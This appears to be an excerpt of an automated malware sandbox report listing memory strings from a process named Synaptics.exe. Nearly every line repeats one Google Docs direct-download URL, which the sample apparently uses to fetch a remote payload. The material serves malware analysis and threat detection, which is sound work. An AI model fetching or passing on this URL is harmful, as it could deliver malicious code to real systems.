                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU%7
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU4
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUM
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUp
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV4q$
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV5
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVWDFP
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVl
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVr
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW$
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWatch
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW~
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXG
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXO
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                          Source: Synaptics.exe, 00000004.00000002.2407807628.000000003360E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYx
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYyw
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYz
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_l
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_lpfd
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-pla
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada5
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada:
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaF
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadac
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamP
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadame
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadan
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadap
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadar
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadate
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadax
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbjectCWt
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbs
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-_
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcFh
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcO
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle~u
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua_
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadchc
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcisco
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnc
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcnf/
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcontef
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct.n
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctor/W(
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddL
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddp
                          Source: Synaptics.exe, 00000004.00000002.2284139607.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddsh
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd~E
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.U%
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.az
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeV
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded.mo
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle
